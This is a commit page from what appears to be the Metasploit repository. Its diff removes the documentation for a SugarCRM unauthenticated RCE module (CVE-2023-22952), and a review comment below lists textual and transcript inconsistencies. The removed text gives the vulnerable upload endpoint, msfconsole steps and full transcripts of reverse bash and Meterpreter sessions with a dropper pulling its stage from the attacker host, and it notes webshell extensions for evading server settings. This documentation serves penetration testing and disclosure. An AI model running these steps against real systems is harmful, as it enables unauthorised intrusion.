Added support for native PHP payloads and reengineered webshells

This commit is contained in:
h00die-gr3y
2023-02-16 12:36:56 +00:00
committed by Grant Willcox
parent c844d4d714
commit dc8ebb722a
2 changed files with 167 additions and 89 deletions
@@ -1,178 +0,0 @@
## Vulnerable Application
This module exploits a Remote Code Execution (RCE) vulnerability that has been identified in the SugarCRM application.
The vulnerability in sugarCRM could allows an unauthenticated attacker to upload a malicious `PNG` file with embedded PHP code
to the `/cache/images/` directory on the web server using the vulnerable endpoint `/index.php?module=EmailTemplates&action=AttachFiles`.
Once uploaded to the server, depending on server configuration, the attacker may be able to execute that code over the web
via http or https gaining access to the system.
The RCE is unauthenticated because of a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`.
After a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application.
See this [AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) for more details.
Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges
under which the web services run (typically `www-data`).
SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions `11.0.4` and below are affected. Fixed in release `11.0.5`
SugarCRM 12.0 Enterprise, Sell and Serve versions `12.0.1` and below are affected. Fixed in release `12.0.2`.
Installing a vulnerable test bed requires a Linux machine with the vulnerable SugarCRM software loaded.
This module has been tested against a SugarCRM installation with the specifications listed below:
* SugarCRM Enterprise Edition
* Version: `11.0.4`
* Build: `300`
* Linux OS: Debian 8.6
`
## Verification Steps
1. `use exploit/linux/http/sugarcrm_webshell_cve_2023_22952`
1. `set RHOSTS <TARGET HOSTS>`
1. `set RPORT <port>`
1. `set LHOST <attacker host ip>`
1. `set LPORT <attacker host port>`
1. `set TARGET <0-Unix command or 1-Linux Dropper>`
1. `exploit`
1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
## Options
### WEBSHELL
You can use this option to set the filename and extension of the webshell.
This is handy if you want to test the webshell upload and execution with different file extensions (.phtml, .php7, .inc)
to bypass any security settings on the Web and PHP server.
## Scenarios
### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - bash reverse shell
```
msf6 > use exploit/linux/http/sugarcrm_webshell_cve_2023_22952
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > options
Module options (exploit/linux/http/sugarcrm_webshell_cve_2023_22952):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
lhost => 192.168.100.254
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
lport => 4444
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set target 0
target => 0
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted RPXrYGLCvGjL.phar
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:52584) at 2023-01-19 19:14:56 +0000
whoami
www-data
exit
```
### SugarCRM 11.0.4 Enterprise Build 300 on Debian 8.6 - Meterpreter session
```
msf6 > use exploit/linux/http/sugarcrm_webshell_cve_2023_22952
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > options
Module options (exploit/linux/http/sugarcrm_webshell_cve_2023_22952):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine
or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux Dropper
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lhost 192.168.100.254
lhost => 192.168.100.254
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set lport 4444
lport => 4444
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > set target 1
target => 1
msf6 exploit(linux/http/sugarcrm_webshell_cve_2023_22952) > exploit
[*] Started reverse TCP handler on 192.168.100.254:4444
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.100.254:8080/aLYDt2
[*] Client 127.0.0.1 (Wget/1.16 (linux-gnu)) requested /aLYDt2
[*] Sending payload to 127.0.0.1 (Wget/1.16 (linux-gnu))
[*] Sending stage (3045348 bytes) to 127.0.0.1
[+] Deleted ZxGTSVGsOUZs.phtml
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:43076) at 2023-01-19 19:16:07 +0000
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : sugarcrm
OS : Debian 8.6 (Linux 2.6.32)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
```
## Limitations
No `check` method.
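Review bot: the hunk `@@ -1,178 +0,0 @@` deletes the module documentation outright while the commit summary reports 167 additions across 2 files, so this reads as a rename plus rewrite; the replacement file should carry over the `### WEBSHELL` option description and the `## Limitations` entry (`No check method`), and add a target plus a scenario for the native PHP payloads named in the commit message, since the Verification Steps only offer `set TARGET <0-Unix command or 1-Linux Dropper>`. While the text is being moved, fix the defects visible in these lines: the stray backtick on its own line after `Linux OS: Debian 8.6`; `could allows` should be `could allow`; `Any user privileges can exploit this vulnerability` contradicts the preceding paragraph, which says the flaw is unauthenticated, so state plainly that no credentials are required; and `Fixed in release 11.0.5` is missing its full stop. The two scenario transcripts also do not hold together: the Meterpreter run prints `Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp` although the configured payload is `linux/x64/meterpreter_reverse_tcp`, and both runs report sessions from `127.0.0.1` (`127.0.0.1:4444 -> 127.0.0.1:52584`, `Client 127.0.0.1 (Wget/1.16 (linux-gnu))`) even though the handler was started on `192.168.100.254:4444` against `rhosts 192.168.100.180`, so they were evidently captured through a local port forward or spliced from different runs and should be re-captured from a single clean run. Finally, the `WEBSHELL` wording `to bypass any security settings on the Web and PHP server` overstates what an extension change does; say instead that the option lets the operator pick an extension (`.phtml`, `.php7`, `.inc`) that the target's PHP handler is actually configured to execute.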